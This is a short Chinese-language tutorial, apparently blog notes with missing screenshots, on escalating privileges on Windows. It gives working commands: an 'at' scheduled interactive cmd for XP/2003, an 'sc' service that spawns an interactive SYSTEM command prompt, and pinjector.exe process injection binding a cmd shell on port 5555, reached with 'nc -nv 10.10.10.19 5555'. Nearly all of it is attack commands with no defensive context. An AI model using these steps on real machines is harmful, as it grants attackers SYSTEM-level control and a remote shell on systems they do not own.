• PsExec
  • at
  • Process_Injector
  • sc

psexec

当前用户是jh
windows提权
提权之后
windows提权


*at命令提权(适用于xp,2003)

at 15:05 /interact cmd  

windows提权_第1张图片


sc

创建服务(打开cmd命令窗口的服务)

    sc Create systemcmd binPath= "cmd /K start" type= own type= interact

启动服务刚才创建的服务

    sc start systemcmd

process_injector

列出当前的所有进程

pinjector.exe -l

windows提权_第2张图片

选择要提权成的用户,进行进程注入

pinjector.exe -p 732 cmd 5555   #服务端实现进程注入
nc -nv 10.10.10.19 5555    # 客户端连接服务端

windows提权_第3张图片